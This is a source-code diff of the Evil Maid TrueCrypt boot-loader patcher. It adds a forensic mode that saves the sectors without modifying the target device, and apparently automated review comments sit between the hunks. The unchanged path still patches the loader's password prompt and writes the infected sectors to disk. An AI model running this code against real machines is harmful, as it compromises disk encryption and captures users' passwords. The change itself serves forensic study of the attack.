- --- patch_tc.c 2009-10-13 20:06:07.000000000 +0200
- +++ patch_tc_modified.c 2014-03-23 22:14:49.073346732 +0100
- @@ -1,3 +1,13 @@
- +/*
- + Original blog post: http://theinvisiblethings.blogspot.nl/2009/10/evil-maid-goes-after-truecrypt.html
- + Original src download: http://invisiblethingslab.com/resources/evilmaid/evilmaid-src-1.0.tgz
- + Original Author: Joanna Rutkowska
- + Modified by: DiabloHorn
- +
- + Slight modification to permit the saving of the sectors and the unzipped
- + second loader without modifying the original image / device
- +*/
- +
- #include <stdio.h>
- #include <stdlib.h>
- #include <fcntl.h>
- @@ -16,6 +26,7 @@
- typedef enum {FALSE = 0, TRUE} bool;
- +int do_forensically = 0;
- bool SaveSectors (
- void* Sectors,
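Review bot: `do_forensically` is added as a non-static global `int` directly below the file's own `bool` typedef. As far as the visible hunks show, it is a mode switch used only inside this translation unit, so `static bool do_forensically = FALSE;` would match the surrounding type and keep it out of the global namespace. A one-line comment such as `/* non-zero: never write to the target image/device */` would state the guarantee that the later hunks depend on.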
- @@ -217,10 +228,12 @@
- return FALSE;
- uCompressedLoaderSize = *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET];
- +
- if (uCompressedLoaderSize > (uSectorsCount - 5) * SECTOR_SIZE)
- return FALSE;
- uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedLoaderSize);
- +
- if (*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] != uChecksum)
- return FALSE;
- @@ -259,7 +272,7 @@
- uCompressedLoaderSize = *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET];
- printf ("PatchTrueCrypt(): Compressed loader size: %d bytes\n", uCompressedLoaderSize);
- -
- + printf ("PatchTrueCrypt(): Saved checksum 0x%X\n", (*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET]));
- // in MBR:
- // B9 FF XX mov cx, 0xXXff ; TC_BOOT_MEMORY_REQUIRED * 1024 - TC_COM_EXECUTABLE_OFFSET - 1
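Review bot: The added printf passes an `unsigned long` to `%X`, which expects `unsigned int`, so on LP64 targets the format and argument disagree. The `*(unsigned long*)` load also reads eight bytes there from a field the tool appears to treat as a 32-bit checksum (inferred from the other `0x%X` prints of uChecksum). Copying the field into a 32-bit variable with `memcpy` and printing it with `(unsigned) saved` avoids both the mismatch and the unaligned, over-wide read. The unchanged comparison in the @@ -217 hunk uses the same cast and has the same width problem. The enclosing function starts and ends outside this hunk.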
- @@ -297,124 +310,125 @@
- }
- printf ("PatchTrueCrypt(): Decompression successful\n");
- + if(!do_forensically){
- + hDecompressedLoader = open (LOADER, O_RDONLY);
- + if (hDecompressedLoader < 0) {
- + printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
- + return FALSE;
- + }
- +
- + if (fstat (hDecompressedLoader, &FileStatStruct) == -1) {
- + printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
- + close (hDecompressedLoader);
- + return FALSE;
- + }
- + uDecompressedLoaderSize = FileStatStruct.st_size;
- +
- + printf ("PatchTrueCrypt(): Decompressed loader physical size: %d bytes\n", uDecompressedLoaderSize);
- +
- + if (uDecompressedLoaderSize > uLoaderMemorySize) {
- + printf ("PatchTrueCrypt(): Memory size taken from MBR contradicts the decompressed binary size\n");
- + close (hDecompressedLoader);
- + return FALSE;
- + }
- +
- + pDecompressedLoader = malloc (uLoaderMemorySize);
- + if (!pDecompressedLoader) {
- + printf ("PatchTrueCrypt(): Failed to allocate memory for the decompressed loader\n");
- + close (hDecompressedLoader);
- + return FALSE;
- + }
- + memset (pDecompressedLoader, 0, uLoaderMemorySize);
- +
- + nbRead = read (hDecompressedLoader, pDecompressedLoader, uDecompressedLoaderSize);
- + if (nbRead != uDecompressedLoaderSize) {
- + printf
- + ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the decompressed loader\n",
- + errno);
- + free (pDecompressedLoader);
- + close (hDecompressedLoader);
- + return FALSE;
- + }
- - hDecompressedLoader = open (LOADER, O_RDONLY);
- - if (hDecompressedLoader < 0) {
- - printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
- - return FALSE;
- - }
- -
- - if (fstat (hDecompressedLoader, &FileStatStruct) == -1) {
- - printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
- - close (hDecompressedLoader);
- - return FALSE;
- - }
- - uDecompressedLoaderSize = FileStatStruct.st_size;
- -
- - printf ("PatchTrueCrypt(): Decompressed loader physical size: %d bytes\n", uDecompressedLoaderSize);
- -
- - if (uDecompressedLoaderSize > uLoaderMemorySize) {
- - printf ("PatchTrueCrypt(): Memory size taken from MBR contradicts the decompressed binary size\n");
- - close (hDecompressedLoader);
- - return FALSE;
- - }
- -
- - pDecompressedLoader = malloc (uLoaderMemorySize);
- - if (!pDecompressedLoader) {
- - printf ("PatchTrueCrypt(): Failed to allocate memory for the decompressed loader\n");
- - close (hDecompressedLoader);
- - return FALSE;
- - }
- - memset (pDecompressedLoader, 0, uLoaderMemorySize);
- -
- - nbRead = read (hDecompressedLoader, pDecompressedLoader, uDecompressedLoaderSize);
- - if (nbRead != uDecompressedLoaderSize) {
- - printf
- - ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the decompressed loader\n",
- - errno);
- - free (pDecompressedLoader);
- - close (hDecompressedLoader);
- - return FALSE;
- - }
- -
- -
- - close (hDecompressedLoader);
- - unlink (LOADER);
- -
- -/*
- - if (!SaveSectors (pDecompressedLoader, uLoaderMemorySize, "unc")) {
- - return FALSE;
- - }
- -*/
- -
- - pUncompressedPatchedLoader = NULL;
- - uPatchedLoaderMemorySize = 0;
- - if (!PatchAskPassword
- - (pDecompressedLoader, uLoaderMemorySize, &pUncompressedPatchedLoader, &uPatchedLoaderMemorySize,
- - pbAlreadyInfected)) {
- - printf ("PatchTrueCrypt(): PatchAskPassword() failed\n");
- - free (pDecompressedLoader);
- - return FALSE;
- - }
- -
- - free (pDecompressedLoader);
- - *(unsigned short*) & pFirstSectors[uLoaderMemorySizeMBROffset] =
- - ALIGN (uPatchedLoaderMemorySize, 0x400) - 1 - TC_COM_EXECUTABLE_OFFSET;
- -
- - if (!SaveSectors (pUncompressedPatchedLoader, uPatchedLoaderMemorySize, PATCHED_LOADER)) {
- - free (pUncompressedPatchedLoader);
- - return FALSE;
- - }
- -
- - free (pUncompressedPatchedLoader);
- -
- - unlink (PATCHED_LOADER_COMPRESSED);
- -
- - printf ("PatchTrueCrypt(): Compressing the patched loader\n");
- -
- - if (WEXITSTATUS(system("gzip -n --best -f " PATCHED_LOADER)) != 0) {
- - printf ("PatchTrueCrypt(): Compression failed\n");
- - return FALSE;
- - }
- -
- - printf ("PatchTrueCrypt(): Compression successful\n");
- -
- - hCompressedPatchedLoader = open (PATCHED_LOADER_COMPRESSED, O_RDONLY);
- - if (hCompressedPatchedLoader < 0) {
- - printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
- - return FALSE;
- - }
- -
- - if (fstat (hCompressedPatchedLoader, &FileStatStruct) == -1) {
- - printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
- - close (hCompressedPatchedLoader);
- - return FALSE;
- - }
- - uCompressedPatchedLoaderSize = FileStatStruct.st_size;
- -
- -
- - printf ("PatchTrueCrypt(): Compressed patched loader size: %d bytes\n", uCompressedPatchedLoaderSize);
- + close (hDecompressedLoader);
- + unlink (LOADER);
- +
- - nbRead = read (hCompressedPatchedLoader, &pFirstSectors[5 * SECTOR_SIZE], uCompressedPatchedLoaderSize);
- - if (nbRead != uCompressedPatchedLoaderSize) {
- - printf
- - ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the compressed loader\n",
- - errno);
- - close (hCompressedPatchedLoader);
- - return FALSE;
- - }
- + /*
- + if (!SaveSectors (pDecompressedLoader, uLoaderMemorySize, "unc")) {
- + return FALSE;
- + }
- + */
- +
- + pUncompressedPatchedLoader = NULL;
- + uPatchedLoaderMemorySize = 0;
- + if (!PatchAskPassword
- + (pDecompressedLoader, uLoaderMemorySize, &pUncompressedPatchedLoader, &uPatchedLoaderMemorySize,
- + pbAlreadyInfected)) {
- + printf ("PatchTrueCrypt(): PatchAskPassword() failed\n");
- + free (pDecompressedLoader);
- + return FALSE;
- + }
- +
- + free (pDecompressedLoader);
- +
- + *(unsigned short*) & pFirstSectors[uLoaderMemorySizeMBROffset] =
- + ALIGN (uPatchedLoaderMemorySize, 0x400) - 1 - TC_COM_EXECUTABLE_OFFSET;
- +
- + if (!SaveSectors (pUncompressedPatchedLoader, uPatchedLoaderMemorySize, PATCHED_LOADER)) {
- + free (pUncompressedPatchedLoader);
- + return FALSE;
- + }
- +
- + free (pUncompressedPatchedLoader);
- +
- + unlink (PATCHED_LOADER_COMPRESSED);
- +
- + printf ("PatchTrueCrypt(): Compressing the patched loader\n");
- +
- + if (WEXITSTATUS(system("gzip -n --best -f " PATCHED_LOADER)) != 0) {
- + printf ("PatchTrueCrypt(): Compression failed\n");
- + return FALSE;
- + }
- +
- + printf ("PatchTrueCrypt(): Compression successful\n");
- +
- + hCompressedPatchedLoader = open (PATCHED_LOADER_COMPRESSED, O_RDONLY);
- + if (hCompressedPatchedLoader < 0) {
- + printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
- + return FALSE;
- + }
- +
- + if (fstat (hCompressedPatchedLoader, &FileStatStruct) == -1) {
- + printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
- + close (hCompressedPatchedLoader);
- + return FALSE;
- + }
- + uCompressedPatchedLoaderSize = FileStatStruct.st_size;
- +
- +
- + printf ("PatchTrueCrypt(): Compressed patched loader size: %d bytes\n", uCompressedPatchedLoaderSize);
- +
- + nbRead = read (hCompressedPatchedLoader, &pFirstSectors[5 * SECTOR_SIZE], uCompressedPatchedLoaderSize);
- + if (nbRead != uCompressedPatchedLoaderSize) {
- + printf
- + ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the compressed loader\n",
- + errno);
- + close (hCompressedPatchedLoader);
- + return FALSE;
- + }
- - close (hCompressedPatchedLoader);
- - unlink (PATCHED_LOADER_COMPRESSED);
- + close (hCompressedPatchedLoader);
- + unlink (PATCHED_LOADER_COMPRESSED);
- - uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedPatchedLoaderSize);
- - printf ("PatchTrueCrypt(): New checksum: 0x%X\n", uChecksum);
- -
- - *(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] = uChecksum;
- - *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = (short) uCompressedPatchedLoaderSize;
- + uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedPatchedLoaderSize);
- + printf ("PatchTrueCrypt(): New checksum: 0x%X\n", uChecksum);
- + *(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] = uChecksum;
- + *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = (short) uCompressedPatchedLoaderSize;
- + }
- return TRUE;
- }
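Review bot: On the `do_forensically` path the function now returns TRUE without writing through `pbAlreadyInfected`, because the only visible writer is the skipped PatchAskPassword() call. If the caller reads that flag after a successful return (the caller is outside this hunk, and this assumes the parameter is the `bool*` its name suggests), it sees whatever it happened to initialise. Wrapping roughly 120 lines in `if(!do_forensically){ ... }` also buries the real change in re-indentation. A guard clause right after the "Decompression successful" message, `if (do_forensically) { *pbAlreadyInfected = FALSE; return TRUE; }`, would keep the diff to a few lines and leave the existing path byte-identical. The function begins outside this hunk.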
- @@ -458,11 +472,15 @@
- printf (VER_STRING);
- - if (argc != 2) {
- + if (argc < 2) {
- printf ("Usage: %s <target>\n", argv[0]);
- return 1;
- }
- -
- +
- + if( argc == 3){
- + do_forensically = 1;
- + }
- +
- if (!ReadFirstSectors (argv[1], SECTORS_TO_BACKUP, (char**)&pFirstSectors, &hDevice)) {
- return 2;
- }
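Review bot: Relaxing the check to `argc < 2` means only an argument count of exactly three selects the non-writing mode; with four or more arguments the program silently falls through to the path that writes to the target. The content of the third argument is never inspected either. For a mode whose stated purpose is to leave the image or device unmodified, the parser should fail closed: use `if (argc != 2 && argc != 3) {` for the usage check and extend the usage string to document the optional argument. The enclosing function starts and ends outside this hunk.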
- @@ -499,24 +517,25 @@
- return 5;
- }
- }
- + if(!do_forensically){
- + lseek (hDevice, 0, SEEK_SET);
- - lseek (hDevice, 0, SEEK_SET);
- -
- - nbWritten = write (hDevice, pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE);
- - if (nbWritten != SECTORS_TO_BACKUP * SECTOR_SIZE) {
- - printf ("Failed to update the first sectors of a device, last error %d\n", errno);
- - close (hDevice);
- - //unlink (szBackupName);
- - return FALSE;
- - }
- -
- -/* if (!SaveSectors (pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE, "patched_image")) {
- - printf ("SaveSectors() failed to backup first %d sectors of the drive\n", SECTORS_TO_BACKUP);
- - free (pFirstSectors);
- - close (hDevice);
- - return;
- - }
- -*/
- + nbWritten = write (hDevice, pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE);
- + if (nbWritten != SECTORS_TO_BACKUP * SECTOR_SIZE) {
- + printf ("Failed to update the first sectors of a device, last error %d\n", errno);
- + close (hDevice);
- + //unlink (szBackupName);
- + return FALSE;
- + }
- +
- + /* if (!SaveSectors (pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE, "patched_image")) {
- + printf ("SaveSectors() failed to backup first %d sectors of the drive\n", SECTORS_TO_BACKUP);
- + free (pFirstSectors);
- + close (hDevice);
- + return;
- + }
- + */
- + }
- free (pFirstSectors);
- close (hDevice);
- return 0;
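Review bot: Skipping the `write()` inside `if(!do_forensically)` is the only thing that keeps the forensic mode from modifying the target. `hDevice` is still whatever ReadFirstSectors() opened earlier, which is outside this hunk and presumably read-write, since the normal path writes through it. For evidence handling the descriptor itself should be opened `O_RDONLY` in that mode, so the guarantee does not rest on one branch staying correct. Separately, the re-indented failure branch still does `return FALSE;`, which from what looks like main is exit status 0, and it skips `free (pFirstSectors);`. A non-zero code in the style of the neighbouring `return 5;` would let callers detect the failure.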